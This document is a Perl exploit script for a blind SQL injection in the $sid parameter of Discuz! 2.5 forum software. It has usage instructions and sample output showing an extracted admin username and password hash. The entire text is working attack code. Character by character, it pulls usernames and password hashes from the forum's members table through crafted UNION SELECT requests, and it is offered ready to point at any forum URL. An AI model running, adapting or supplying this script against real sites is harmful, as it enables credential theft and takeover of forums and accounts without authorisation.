#!/usr/bin/perl #Discuz! 2.5 $sid SQL injection exploit #Need magic_quotes_gpc = Off #Bug Found By SuperHei_at_www.4ngel.net #The codz base on 1dt.w0lf(rst.void.ru)'s codz Thx! # #C:\Perl\bin>dz3.pl http://127.0.0.1/Discuz!_2.5F_gb/upload 1 #Please wait... #[||||||||||||||||||||||||||||||||||||||] # #------------------x REPORT x------------------- # Uid: 1 # Username: admin # Password Hash: 25f9e794323b453885f5181f1b624d0b #------------------x REPORT x------------------- #total requests: 326 use LWP::UserAgent; $path = $ARGV[0]; $uid = $ARGV[1]; $string = "to:"; $s_num = 1; $n=0; $|++; if (@ARGV < 2) { &usage; } print "Please wait...\r\n"; print "["; while(1) { &found(0,122); if ($char=="0") { print "]\r\n\r\n"; ($res1,$res2)=split(":",$allchar); # print "------------------x REPORT x-------------------\r\n"; print " Uid: $uid\r\n"; print " Username: $res1\r\n"; print " Password Hash: $res2\r\n"; print "------------------x REPORT x-------------------\r\n"; print "total requests: $n\r\n"; exit(); } else { print "|"; $allchar .= chr($char); } $s_num++; } sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax); return $char; } $r = int($fmax - ($fmax-$fmin)/2); $check = ">$r"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r+1); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } return; } sub check($) { $n++; $ccheck = $_[0]; $http_query = $path."/index.php?sid=' union select null,null,null,null,null from cdb_members where uid=".$uid." AND ascii(substring(CONCAT(username,CHAR(58),Password),".$s_num.",1))".$ccheck." /*"; # print "\r\n $http_query \r\n"; $mcb_reguest = LWP::UserAgent->new() or die; $res = $mcb_reguest->post($http_query); @results = $res->content; @num=grep /$string/, @results; $size=@num; if ($size > 0) { return 1; } return 0; } sub usage { print "=========================================================\r\n"; print " Discuz! 2.5 \$sid SQL injection exploit\r\n"; print " Need magic_quotes_gpc = Off \r\n"; print "=========================================================\r\n"; print " Usage: $0 [bbspath/] [uid]\r\n"; print " e.g. : $0 http://127.0.0.1/bbs 1\r\n"; print "=========================================================\r\n"; exit(); }